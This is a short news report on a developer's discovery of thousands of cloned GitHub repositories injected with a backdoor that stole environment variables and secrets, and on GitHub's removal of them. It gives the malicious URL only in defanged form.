Developer Steven Lacy claims that he discovered 35,000 projects on GitHub that were cloned, and their copies were injected with malicious code to attack unsuspecting users of the service. GitHub removed most of the dangerous repositories after Lacey contacted the team.
The original repositories have not been compromised in any way. Among them are such well-known projects as crypto, golang, python, js, bash, docker, k8s and others. However, a backdoor was added to their copy to spread malware, says Dev.
Lacy found one open source project through Google search, in the code of which he noticed the web address hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru, and shared the find on Twitter. A GitHub search turned up over 35,000 files containing a malicious URL. That is, notes Bleeping Computer, this figure shows the number of suspicious files, not dangerous repositories – Lacy later corrected himself.
Of the 35,788 results, more than 13,000 belonged to one repository – redhat-operator-ecosystem , and apparently it is no longer on GitHub.
Other experts found that cloned repositories with a malicious URL extracted user environment variables and were provided with a one-line backdoor. Hackers could thus steal important secrets, including API keys, tokens, credentials from Amazon AWS, and cryptographic keys of victims, as well as remotely execute arbitrary code on infected systems.
In terms of timing, most of the cloned repositories received malicious code in July, between 6 and 20 days ago, notes NIX Solutions. But Bleeping Computer came across repositories in which it appeared back in 2015.
Yesterday GitHub reported on the issue. Dangerous clone repositories have been removed from the platform.